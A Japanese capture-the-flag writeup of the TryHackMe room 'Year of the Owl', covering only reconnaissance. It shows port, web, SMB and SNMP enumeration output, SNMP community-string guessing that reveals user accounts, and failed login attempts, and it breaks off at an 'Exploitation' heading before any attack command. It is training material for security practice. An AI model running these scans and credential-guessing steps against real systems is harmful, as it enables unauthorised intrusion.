はじめに
本記事は、TryHackMeのwriteupです。
Roomは、Year of the Owl、Difficulty(難易度)はHardです。
このRoomでは、Year of the OwlにおけるActive DirecctoryやSNMPプロトコル
の攻撃手法について学ぶことができます。
Recon
Port Scan
Scanned at 2026-05-05 21:45:53 JST for 59s
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 126 Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1g PHP/7.4.10)
|_http-title: Year of the Owl
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.4.10
139/tcp open netbios-ssn syn-ack ttl 126 Microsoft Windows netbios-ssn
443/tcp open ssl/http syn-ack ttl 126 Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1g PHP/7.4.10)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.4.10
|_http-title: Year of the Owl
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost
| Issuer: commonName=localhost
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2009-11-10T23:48:47
| Not valid after: 2019-11-08T23:48:47
| MD5: a0a4 4cc9 9e84 b26f 9e63 9f9e d229 dee0
| SHA-1: b023 8c54 7a90 5bfa 119c 4e8b acca eacf 3649 1ff6
| SHA-256: 0169 7338 0c0f 1df0 0bd9 593e d8d5 efa3 706c d6df 7993 f614 1272 b805 22ac dd23
| -----BEGIN CERTIFICATE-----
| MIIBnzCCAQgCCQC1x1LJh4G1AzANBgkqhkiG9w0BAQUFADAUMRIwEAYDVQQDEwls
| b2NhbGhvc3QwHhcNMDkxMTEwMjM0ODQ3WhcNMTkxMTA4MjM0ODQ3WjAUMRIwEAYD
| VQQDEwlsb2NhbGhvc3QwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAMEl0yfj
| 7K0Ng2pt51+adRAj4pCdoGOVjx1BmljVnGOMW3OGkHnMw9ajibh1vB6UfHxu463o
| J1wLxgxq+Q8y/rPEehAjBCspKNSq+bMvZhD4p8HNYMRrKFfjZzv3ns1IItw46kgT
| gDpAl1cMRzVGPXFimu5TnWMOZ3ooyaQ0/xntAgMBAAEwDQYJKoZIhvcNAQEFBQAD
| gYEAavHzSWz5umhfb/MnBMa5DL2VNzS+9whmmpsDGEG+uR0kM1W2GQIdVHHJTyFd
| aHXzgVJBQcWTwhp84nvHSiQTDBSaT6cQNQpvag/TaED/SEQpm0VqDFwpfFYuufBL
| vVNbLkKxbK2XwUvu0RxoLdBMC/89HqrZ0ppiONuQ+X2MtxE=
|_-----END CERTIFICATE-----
| tls-alpn:
|_ http/1.1
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
445/tcp open microsoft-ds? syn-ack ttl 126
3306/tcp open mysql syn-ack ttl 126 MariaDB 10.3.24 or later (unauthorized)
3389/tcp open ms-wbt-server syn-ack ttl 126 Microsoft Terminal Services
|_ssl-date: 2026-05-05T12:46:50+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=year-of-the-owl
| Issuer: commonName=year-of-the-owl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2026-05-04T12:44:33
| Not valid after: 2026-11-03T12:44:33
| MD5: 92cd f85e bbee 25b0 4b31 f0e7 c0eb e647
| SHA-1: fd32 1ddb 2e7e d433 1439 3fb4 0920 f25e 1f56 0282
| SHA-256: 78b7 6df1 a429 4efb 6ef7 8355 28d4 9070 401d d6b7 6621 52f0 26e9 06d0 e298 823f
| -----BEGIN CERTIFICATE-----
| MIIC4jCCAcqgAwIBAgIQNO7+zt+uEbhHAJWkGEUfFTANBgkqhkiG9w0BAQsFADAa
| MRgwFgYDVQQDEw95ZWFyLW9mLXRoZS1vd2wwHhcNMjYwNTA0MTI0NDMzWhcNMjYx
| MTAzMTI0NDMzWjAaMRgwFgYDVQQDEw95ZWFyLW9mLXRoZS1vd2wwggEiMA0GCSqG
| SIb3DQEBAQUAA4IBDwAwggEKAoIBAQCbpyWYJKfCf8Fx/0IkH642hpD21/Bx2Ec8
| JYwwN9kPBvt3k/TFiUSfQ85Uh6mzcQ8qmMRW1jmR+kqfVPJ3C+lZ0OsHdF9M2taY
| BFYPno6yMwNII58ZpMrHgpE6Mh1r5P6T8IpZRYzu7QndAtjwgkzVuRuqbS00W5pG
| mttIvhpSGT2vI0pydoAGIdbuAW7nJZv820IHIlCjWHCgw5/09HEgB0RlLfGA8Rth
| JSVqo6LlfXJB4k76nZyMkKepKEUNSPXQSv0MED0fUxpPv4XIkfjW0u0gpl/9dRyh
| vRBlnW9Hjwx+G/aldLKnGlTzng6UhkSIJ7AT1v8QitTDF0HJKt51AgMBAAGjJDAi
| MBMGA1UdJQQMMAoGCCsGAQUFBwMBMAsGA1UdDwQEAwIEMDANBgkqhkiG9w0BAQsF
| AAOCAQEAmJxobSDeKmidGZyKkQ5XTYSUi9TzAmvyLcOe5yNDttPJFq28uW5M9y3N
| /BkAZfejUMMzZe4dEYnXQP4yO8zCIsgt4itgcIp+3dp50aQgMLjvKCNQ67q3qyeG
| OqTprxlMeeW8rr+BAXlWDOblJTUjeJDQQ8GmQ9xD0kOvMO1MhJ6kMTRlIsDHPDoZ
| eWga7Equ77vWJ069p3ENYPAn0mSIBap1eAGp0XrmcEBm3waWdE9FYzwSYqSKbZjI
| d5HXXemb9lAhoWcHKN9HEGAfIz/qxAjZYo7xdTba/Va8HM976o6+N7yHlRPiybW+
| xs8dzFLW0b7hJxVImtmu1BXYOeWaRA==
|_-----END CERTIFICATE-----
| rdp-ntlm-info:
| Target_Name: YEAR-OF-THE-OWL
| NetBIOS_Domain_Name: YEAR-OF-THE-OWL
| NetBIOS_Computer_Name: YEAR-OF-THE-OWL
| DNS_Domain_Name: year-of-the-owl
| DNS_Computer_Name: year-of-the-owl
| Product_Version: 10.0.17763
|_ System_Time: 2026-05-05T12:46:10+00:00
5985/tcp open http syn-ack ttl 126 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http syn-ack ttl 126 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
|_clock-skew: mean: 0s, deviation: 0s, median: 0s
| smb2-time:
| date: 2026-05-05T12:46:13
|_ start_date: N/A
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 14242/tcp): CLEAN (Timeout)
| Check 2 (port 33917/tcp): CLEAN (Timeout)
| Check 3 (port 22914/udp): CLEAN (Timeout)
| Check 4 (port 38214/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
enum4linux
┌──(rikuxx㉿kali)-[~]
└─$ enum4linux [target_ip]
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue May 5 21:59:04 2026
=========================================( Target Information )=========================================
Target ........... [target_ip]
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
===========================( Enumerating Workgroup/Domain on [target_ip] )===========================
[E] Can't find workgroup/domain
===============================( Nbtstat Information for [target_ip] )===============================
Looking up status of [target_ip]
No reply from [target_ip]
===================================( Session Check on [target_ip] )===================================
[E] Server doesn't allow session using username '', password ''. Aborting remainder of tests.
現状を把握するに、結構幅が広い印象的です。
これは、Active Direcotory側とWeb側、そして、ネットワーク側の調査で分ける必要がありそうです。
Scanning
Web Scanning
Gobuster
┌──(rikuxx㉿kali)-[~/tryhackme/Year_of_the_Owl]
└─$ gobuster dir -w /usr/share/wordlists/dirb/common.txt -u http://[target_ip]/
===============================================================
Gobuster v3.8.2
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://[target_ip]/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8.2
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
.htaccess (Status: 403) [Size: 303]
.hta (Status: 403) [Size: 303]
.htpasswd (Status: 403) [Size: 303]
aux (Status: 403) [Size: 303]
cgi-bin/ (Status: 403) [Size: 303]
com1 (Status: 403) [Size: 303]
com3 (Status: 403) [Size: 303]
com2 (Status: 403) [Size: 303]
con (Status: 403) [Size: 303]
examples (Status: 503) [Size: 403]
index.php (Status: 200) [Size: 252]
licenses (Status: 403) [Size: 422]
lpt2 (Status: 403) [Size: 303]
lpt1 (Status: 403) [Size: 303]
nul (Status: 403) [Size: 303]
phpmyadmin (Status: 403) [Size: 303]
prn (Status: 403) [Size: 303]
server-info (Status: 403) [Size: 422]
server-status (Status: 403) [Size: 422]
webalizer (Status: 403) [Size: 303]
Progress: 4613 / 4613 (100.00%)
===============================================================
Finished
===============================================================
クエリパラメータ探索
┌──(rikuxx㉿kali)-[~/tryhackme/Year_of_the_Owl]
└─$ ffuf -u http://[target_ip]/index.php?FUZZ=test -w /usr/share/wordlists/dirb/common.txt -fs 252
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://[target_ip]/index.php?FUZZ=test
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/common.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response size: 252
________________________________________________
:: Progress: [4614/4614] :: Job [1/1] :: 290 req/sec :: Duration: [0:00:21] :: Errors: 0 ::
特にWeb側は無さそうです。
Active Directory Scanning
Samba
┌──(rikuxx㉿kali)-[~/tryhackme/Year_of_the_Owl]
└─$ nxc smb [target_ip] -u "" -p "" --shares
SMB [target_ip] 445 YEAR-OF-THE-OWL [*] Windows 10 / Server 2019 Build 17763 (name:YEAR-OF-THE-OWL) (domain:year-of-the-owl) (signing:False) (SMBv1:None)
SMB [target_ip] 445 YEAR-OF-THE-OWL [-] year-of-the-owl\: STATUS_ACCESS_DENIED
SMB [target_ip] 445 YEAR-OF-THE-OWL [-] Error enumerating shares: Error occurs while reading from remote(104)
これも特に無さそうです。
マジで難しいので、Geminiを格闘していたところ、どうやらSNMPプロトコルが調査できる可能性を信じてみることが良さそうです。
Network Scanning
SNMP
スキャンする際に、下記のSNMPスキャンツールを使用します。
┌──(rikuxx㉿kali)-[~/tryhackme/Year_of_the_Owl]
└─$ onesixtyone -c /usr/share/doc/onesixtyone/dict.txt [target_ip]
Scanning 1 hosts, 50 communities
[target_ip] [openview] Hardware: Intel64 Family 6 Model 79 Stepping 1 AT/AT COMPATIBLE - Software: Windows Version 6.3 (Build 17763 Multiprocessor Free)
どうやら、openviewというコミュニティ名があるそうです。そこで、下記のSNMPスキャンツールを使用し、公開SNMPコミュニティ文字列を使用してターゲットホストをスキャンします
┌──(rikuxx㉿kali)-[~/tryhackme/Year_of_the_Owl]
└─$ snmp-check [target_ip] -c openview
snmp-check v1.9 - SNMP enumerator
Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org)
[+] Try to connect to 10.49.152.221:161 using SNMPv1 and community 'openview'
[*] System information:
Host IP address : 10.49.152.221
Hostname : year-of-the-owl
Description : Hardware: Intel64 Family 6 Model 79 Stepping 1 AT/AT COMPATIBLE - Software: Windows Version 6.3 (Build 17763 Multiprocessor Free)
Contact : -
Location : -
Uptime snmp : 00:43:49.20
Uptime system : 00:42:53.12
System date : 2026-5-5 14:27:25.5
Domain : WORKGROUP
[*] User accounts:
Guest
Jareth
Administrator
DefaultAccount
WDAGUtilityAccount
[*] Network information:
IP forwarding enabled : no
Default TTL : 128
TCP segments received : 146495
TCP segments sent : 16268
TCP segments retrans : 686
Input datagrams : 146616
Delivered datagrams : 146979
Output datagrams : 17160
[*] Network interfaces:
Interface : [ up ] Software Loopback Interface 1
Id : 1
Mac Address : :::::
Type : softwareLoopback
Speed : 1073 Mbps
MTU : 1500
In octets : 0
Out octets : 0
Interface : [ down ] Microsoft 6to4 Adapter
Id : 2
Mac Address : :::::
Type : unknown
Speed : 0 Mbps
MTU : 0
In octets : 0
Out octets : 0
Interface : [ down ] Microsoft IP-HTTPS Platform Adapter
Id : 3
Mac Address : :::::
Type : unknown
Speed : 0 Mbps
MTU : 0
In octets : 0
Out octets : 0
Interface : [ down ] Microsoft Kernel Debug Network Adapter
Id : 4
Mac Address : :::::
Type : ethernet-csmacd
Speed : 0 Mbps
MTU : 0
In octets : 0
Out octets : 0
Interface : [ down ] Intel(R) 82574L Gigabit Network Connection
Id : 5
Mac Address : 00:0c:29:02:45:89
Type : ethernet-csmacd
Speed : 0 Mbps
MTU : 0
In octets : 0
Out octets : 0
Interface : [ down ] Microsoft Teredo Tunneling Adapter
Id : 6
Mac Address : :::::
Type : unknown
Speed : 0 Mbps
MTU : 0
In octets : 0
Out octets : 0
Interface : [ up ] AWS PV Network Device #0
Id : 7
Mac Address : 0a:ec:5a:83:17:fb
Type : ethernet-csmacd
Speed : 1000 Mbps
MTU : 9001
In octets : 12209117
Out octets : 7961383
Interface : [ up ] AWS PV Network Device #0-WFP Native MAC Layer LightWeight Filter-0000
Id : 8
Mac Address : 0a:ec:5a:83:17:fb
Type : ethernet-csmacd
Speed : 1000 Mbps
MTU : 9001
In octets : 12209117
Out octets : 7961383
Interface : [ up ] AWS PV Network Device #0-QoS Packet Scheduler-0000
Id : 9
Mac Address : 0a:ec:5a:83:17:fb
Type : ethernet-csmacd
Speed : 1000 Mbps
MTU : 9001
In octets : 12209117
Out octets : 7961383
Interface : [ up ] AWS PV Network Device #0-WFP 802.3 MAC Layer LightWeight Filter-0000
Id : 10
Mac Address : 0a:ec:5a:83:17:fb
Type : ethernet-csmacd
Speed : 1000 Mbps
MTU : 9001
In octets : 12209117
Out octets : 7961383
[*] Network IP:
Id IP Address Netmask Broadcast
7 10.49.152.221 255.255.192.0 1
1 127.0.0.1 255.0.0.0 1
[*] Routing information:
Destination Next hop Mask Metric
0.0.0.0 10.49.128.1 0.0.0.0 25
10.49.128.0 10.49.152.221 255.255.192.0 281
10.49.152.221 10.49.152.221 255.255.255.255 281
10.49.191.255 10.49.152.221 255.255.255.255 281
127.0.0.0 127.0.0.1 255.0.0.0 331
127.0.0.1 127.0.0.1 255.255.255.255 331
127.255.255.255 127.0.0.1 255.255.255.255 331
169.254.169.123 10.10.0.1 255.255.255.255 50
169.254.169.249 10.10.0.1 255.255.255.255 50
169.254.169.250 10.10.0.1 255.255.255.255 50
169.254.169.251 10.10.0.1 255.255.255.255 50
169.254.169.253 10.10.0.1 255.255.255.255 50
169.254.169.254 10.10.0.1 255.255.255.255 50
224.0.0.0 127.0.0.1 240.0.0.0 331
255.255.255.255 127.0.0.1 255.255.255.255 331
[*] TCP connections and listening ports:
Local address Local port Remote address Remote port State
0.0.0.0 80 0.0.0.0 0 listen
0.0.0.0 135 0.0.0.0 0 listen
0.0.0.0 443 0.0.0.0 0 listen
0.0.0.0 445 0.0.0.0 0 listen
0.0.0.0 3306 0.0.0.0 0 listen
0.0.0.0 3389 0.0.0.0 0 listen
0.0.0.0 5985 0.0.0.0 0 listen
0.0.0.0 47001 0.0.0.0 0 listen
0.0.0.0 49664 0.0.0.0 0 listen
0.0.0.0 49665 0.0.0.0 0 listen
0.0.0.0 49667 0.0.0.0 0 listen
0.0.0.0 49668 0.0.0.0 0 listen
0.0.0.0 49669 0.0.0.0 0 listen
0.0.0.0 49671 0.0.0.0 0 listen
10.49.152.221 139 0.0.0.0 0 listen
10.49.152.221 50004 169.254.169.254 80 synSent
10.49.152.221 50005 169.254.169.254 80 synSent
10.49.152.221 50006 20.165.94.63 443 synSent
10.49.152.221 50007 169.254.169.254 80 synSent
[*] Listening UDP ports:
Local address Local port
0.0.0.0 123
0.0.0.0 161
0.0.0.0 3389
0.0.0.0 5353
0.0.0.0 5355
10.49.152.221 137
10.49.152.221 138
127.0.0.1 61849
[*] Network services:
Index Name
0 Power
1 mysql
2 Server
3 Themes
4 SysMain
5 Apache2.4
6 IP Helper
7 DNS Client
8 DHCP Client
9 Time Broker
10 Workstation
11 SNMP Service
12 User Manager
13 Windows Time
14 CoreMessaging
15 Plug and Play
16 Print Spooler
17 Task Scheduler
18 Windows Update
19 Amazon SSM Agent
20 CNG Key Isolation
21 COM+ Event System
22 Windows Event Log
23 IPsec Policy Agent
24 Group Policy Client
25 RPC Endpoint Mapper
26 Web Account Manager
27 AWS Lite Guest Agent
28 Data Sharing Service
29 Device Setup Manager
30 Network List Service
31 System Events Broker
32 User Profile Service
33 Base Filtering Engine
34 Local Session Manager
35 TCP/IP NetBIOS Helper
36 Cryptographic Services
37 Diagnostic System Host
38 Application Information
39 Certificate Propagation
40 Remote Desktop Services
41 Shell Hardware Detection
42 Diagnostic Policy Service
43 Network Connection Broker
44 Security Accounts Manager
45 Windows Defender Firewall
46 Windows Modules Installer
47 Network Location Awareness
48 Windows Connection Manager
49 Windows Font Cache Service
50 Remote Procedure Call (RPC)
51 Update Orchestrator Service
52 User Access Logging Service
53 DCOM Server Process Launcher
54 Remote Desktop Configuration
55 Windows Update Medic Service
56 Network Store Interface Service
57 Distributed Link Tracking Client
58 System Event Notification Service
59 Connected Devices Platform Service
60 Windows Defender Antivirus Service
61 Windows Management Instrumentation
62 Distributed Transaction Coordinator
63 Background Tasks Infrastructure Service
64 Program Compatibility Assistant Service
65 Connected User Experiences and Telemetry
66 WinHTTP Web Proxy Auto-Discovery Service
67 Windows Push Notifications System Service
68 Windows Remote Management (WS-Management)
69 Remote Desktop Services UserMode Port Redirector
70 Windows Defender Antivirus Network Inspection Service
[*] Processes:
Id Status Name Path Parameters
1 running System Idle Process
4 running System
68 running Registry
396 running taskhostw.exe /RuntimeWide
408 running smss.exe
504 running dwm.exe
564 running csrss.exe
632 running svchost.exe C:\Windows\system32\ -k netsvcs -p
640 running csrss.exe
656 running wininit.exe
700 running winlogon.exe
756 running svchost.exe C:\Windows\System32\ -k LocalSystemNetworkRestricted -p
764 running services.exe
780 running lsass.exe C:\Windows\system32\
840 running svchost.exe C:\Windows\System32\ -k termsvcs
880 running svchost.exe C:\Windows\system32\ -k DcomLaunch -p
904 running fontdrvhost.exe
912 running fontdrvhost.exe
976 running svchost.exe C:\Windows\system32\ -k RPCSS -p
988 running snmp.exe C:\Windows\System32\
1028 running svchost.exe C:\Windows\System32\ -k LocalServiceNetworkRestricted -p
1216 running svchost.exe C:\Windows\system32\ -k LocalService -p
1244 running MsMpEng.exe
1296 running svchost.exe C:\Windows\System32\ -k NetworkService -p
1320 running svchost.exe C:\Windows\system32\ -k LocalServiceNetworkRestricted -p
1416 running LiteAgent.exe C:\Program Files\Amazon\XenTools\
1440 running svchost.exe C:\Windows\system32\ -k LocalServiceNoNetwork -p
1472 running svchost.exe C:\Windows\system32\ -k LocalServiceNoNetworkFirewall -p
1544 running amazon-ssm-agent.exe C:\Program Files\Amazon\SSM\
1616 running httpd.exe C:\xampp\apache\bin\ -k runservice
1692 running svchost.exe C:\Windows\system32\ -k netsvcs
1916 running spoolsv.exe C:\Windows\System32\
2032 running svchost.exe C:\Windows\system32\ -k LocalService
2040 running svchost.exe C:\Windows\System32\ -k utcsvc -p
2076 running mysqld.exe C:\xampp\mysql\bin\ --defaults-file=c:\xampp\mysql\bin\my.ini mysql
2096 running svchost.exe C:\Windows\System32\ -k smbsvcs
2116 running WmiPrvSE.exe C:\Windows\system32\wbem\
2140 running msdtc.exe C:\Windows\System32\
2228 running httpd.exe C:\xampp\apache\bin\ -d C:/xampp/apache
2328 running svchost.exe C:\Windows\system32\ -k NetworkServiceNetworkRestricted -p
2740 running conhost.exe \??\C:\Windows\system32\ 0x4
2916 running LogonUI.exe /flags:0x2 /state0:0xa3a7e055 /state1:0x41c64e6d
2936 running TiWorker.exe C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.17763.1450_none_56e6965b991df4af\ -Embedding
3672 running CompatTelRunner.exe C:\Windows\system32\ -maintenance
3676 running TrustedInstaller.exe C:\Windows\servicing\
3736 running WmiPrvSE.exe C:\Windows\system32\wbem\
3816 running NisSrv.exe
3900 running svchost.exe
3980 running CompatTelRunner.exe C:\Windows\system32\ -m:appraiser.dll -f:DoScheduledTelemetryRun -cv:/dz5id+4cE6lsma3.2
[*] Storage information:
Description : ["C:\\ Label: Serial Number 7c0c3814"]
Device id : [#<SNMP::Integer:0x00007fc40943ed40 @value=1>]
Filesystem type : ["unknown"]
Device unit : [#<SNMP::Integer:0x00007fc40943d1c0 @value=4096>]
Memory size : 19.46 GB
Memory used : 14.15 GB
Description : ["Virtual Memory"]
Device id : [#<SNMP::Integer:0x00007fc409438530 @value=2>]
Filesystem type : ["unknown"]
Device unit : [#<SNMP::Integer:0x00007fc409436b18 @value=65536>]
Memory size : 3.12 GB
Memory used : 1.44 GB
Description : ["Physical Memory"]
Device id : [#<SNMP::Integer:0x00007fc409432130 @value=3>]
Filesystem type : ["unknown"]
Device unit : [#<SNMP::Integer:0x00007fc409430510 @value=65536>]
Memory size : 2.00 GB
Memory used : 1.33 GB
[*] File system information:
Index : 1
Mount point :
Remote mount point : -
Access : 1
Bootable : 0
[*] Device information:
Id Type Status Descr
1 unknown running Microsoft XPS Document Writer v4
2 unknown running Microsoft Print To PDF
3 unknown running Unknown Processor Type
4 unknown unknown Software Loopback Interface 1
5 unknown unknown Microsoft 6to4 Adapter
6 unknown unknown Microsoft IP-HTTPS Platform Adapter
7 unknown unknown Microsoft Kernel Debug Network Adapter
8 unknown unknown Intel(R) 82574L Gigabit Network Connection
9 unknown unknown Microsoft Teredo Tunneling Adapter
10 unknown unknown AWS PV Network Device #0
11 unknown unknown AWS PV Network Device #0-WFP Native MAC Layer LightWeight Filter
12 unknown unknown AWS PV Network Device #0-QoS Packet Scheduler-0000
13 unknown unknown AWS PV Network Device #0-WFP 802.3 MAC Layer LightWeight Filter-
14 unknown running Fixed Disk
15 unknown running Fixed Disk
16 unknown running IBM enhanced (101- or 102-key) keyboard, Subtype=(0)
17 unknown unknown COM1:
[*] Software components:
Index Name
1 XAMPP
2 Microsoft Visual C++ 2017 x64 Minimum Runtime - 14.11.25325
3 Microsoft Visual C++ 2017 x64 Additional Runtime - 14.11.25325
4 Amazon SSM Agent
5 Amazon SSM Agent
6 Microsoft Visual C++ 2017 Redistributable (x64) - 14.11.25325
([target_ip]を適応させるの面倒なので、スキャンできたことが理解できればOKです)
上記の内容から、以下のユーザーリスト(users.txt)を作成可能です。
users.txt
Administrator
Jareth
Guest
DefaultAccount
WDAGUtilityAccount
users.txtを使用し、Samba調査を行います。
┌──(rikuxx㉿kali)-[~/tryhackme/Year_of_the_Owl]
└─$ nxc smb [target_ip] -u ./users.txt -p "" --shares
SMB [target_ip] 445 YEAR-OF-THE-OWL [*] Windows 10 / Server 2019 Build 17763 (name:YEAR-OF-THE-OWL) (domain:year-of-the-owl) (signing:False) (SMBv1:None)
SMB [target_ip] 445 YEAR-OF-THE-OWL [-] year-of-the-owl\Guest: STATUS_ACCOUNT_DISABLED
SMB [target_ip] 445 YEAR-OF-THE-OWL [-] year-of-the-owl\Jareth: STATUS_LOGON_FAILURE
SMB [target_ip] 445 YEAR-OF-THE-OWL [-] year-of-the-owl\Administrator: STATUS_LOGON_FAILURE
SMB [target_ip] 445 YEAR-OF-THE-OWL [-] year-of-the-owl\DefaultAccount: STATUS_ACCOUNT_DISABLED
SMB [target_ip] 445 YEAR-OF-THE-OWL [-] year-of-the-owl\WDAGUtilityAccount: STATUS_LOGON_FAILURE
特に得られる情報は無さそうです。
また、mysqlにも試してみます
┌──(rikuxx㉿kali)-[~/tryhackme/Year_of_the_Owl]
└─$ mysql -h [target_ip] -u Jareth
ERROR 2002 (HY000): Received error packet before completion of TLS handshake. The authenticity of the following error cannot be verified: 1130 - Host 'ip-192-168-160-200.ap-south-1.compute.internal' is not allowed to connect to this MariaDB server
┌──(rikuxx㉿kali)-[~/tryhackme/Year_of_the_Owl]
└─$ mysql -h [target_ip] -u Guest
ERROR 2002 (HY000): Received error packet before completion of TLS handshake. The authenticity of the following error cannot be verified: 1130 - Host 'ip-192-168-160-200.ap-south-1.compute.internal' is not allowed to connect to this MariaDB server
┌──(rikuxx㉿kali)-[~/tryhackme/Year_of_the_Owl]
└─$ mysql -h [target_ip] -u DefaultAccount
ERROR 2002 (HY000): Received error packet before completion of TLS handshake. The authenticity of the following error cannot be verified: 1130 - Host 'ip-192-168-160-200.ap-south-1.compute.internal' is not allowed to connect to this MariaDB server
┌──(rikuxx㉿kali)-[~/tryhackme/Year_of_the_Owl]
└─$ mysql -h [target_ip] -u WDAGUtilityAccount
ERROR 2002 (HY000): Received error packet before completion of TLS handshake. The authenticity of the following error cannot be verified: 1130 - Host 'ip-192-168-160-200.ap-south-1.compute.internal' is not allowed to connect to this MariaDB server
┌──(rikuxx㉿kali)-[~/tryhackme/Year_of_the_Owl]
└─$ mysql -h [target_ip] -u Administrator
ERROR 2002 (HY000): Received error packet before completion of TLS handshake. The authenticity of the following error cannot be verified: 1130 - Host 'ip-192-168-160-200.ap-south-1.compute.internal' is not allowed to connect to this MariaDB server
特に変化が無さそうです。
また、Gobusterも探索してみます。
┌──(rikuxx㉿kali)-[~/tryhackme/Year_of_the_Owl]
└─$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://[target_ip]
===============================================================
Gobuster v3.8.2
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://[target_ip]
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8.2
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
# license, visit http://creativecommons.org/licenses/by-sa/3.0/ (Status: 403) [Size: 303]
examples (Status: 503) [Size: 403]
licenses (Status: 403) [Size: 422]
*checkout* (Status: 403) [Size: 303]
phpmyadmin (Status: 403) [Size: 303]
webalizer (Status: 403) [Size: 303]
*docroot* (Status: 403) [Size: 303]
* (Status: 403) [Size: 303]
con (Status: 403) [Size: 303]
**http%3a (Status: 403) [Size: 303]
*http%3A (Status: 403) [Size: 303]
aux (Status: 403) [Size: 303]
**http%3A (Status: 403) [Size: 303]
**http%3A%2F%2Fwww (Status: 403) [Size: 303]
Progress: 86863 / 220558 (39.38%)^Z
zsh: suspended gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
無さそうです。
また、全ポートを再スキャンしてみますが、これも無さそうです。
┌──(rikuxx㉿kali)-[~]
└─$ sudo nmap -sC -sV -T4 -p- [target_ip]
[sudo] rikuxx のパスワード:
Starting Nmap 7.99 ( https://nmap.org ) at 2026-05-05 23:04 +0900
Nmap scan report for [target_ip]
Host is up (0.15s latency).
Not shown: 65527 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1g PHP/7.4.10)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.4.10
|_http-title: Year of the Owl
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1g PHP/7.4.10)
| tls-alpn:
|_ http/1.1
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.4.10
|_http-title: Year of the Owl
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after: 2019-11-08T23:48:47
445/tcp open microsoft-ds?
3306/tcp open mysql MariaDB 10.3.24 or later (unauthorized)
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: YEAR-OF-THE-OWL
| NetBIOS_Domain_Name: YEAR-OF-THE-OWL
| NetBIOS_Computer_Name: YEAR-OF-THE-OWL
| DNS_Domain_Name: year-of-the-owl
| DNS_Computer_Name: year-of-the-owl
| Product_Version: 10.0.17763
|_ System_Time: 2026-05-05T14:07:14+00:00
| ssl-cert: Subject: commonName=year-of-the-owl
| Not valid before: 2026-05-04T13:49:41
|_Not valid after: 2026-11-03T13:49:41
|_ssl-date: 2026-05-05T14:07:52+00:00; 0s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2026-05-05T14:07:17
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 226.52 seconds
変わらなさそうです。
Exploitation
仕方がなく、他のwriteupを参考しました。
どうやら、以下のようなコマンドで総当たりすることで突破できそうです。
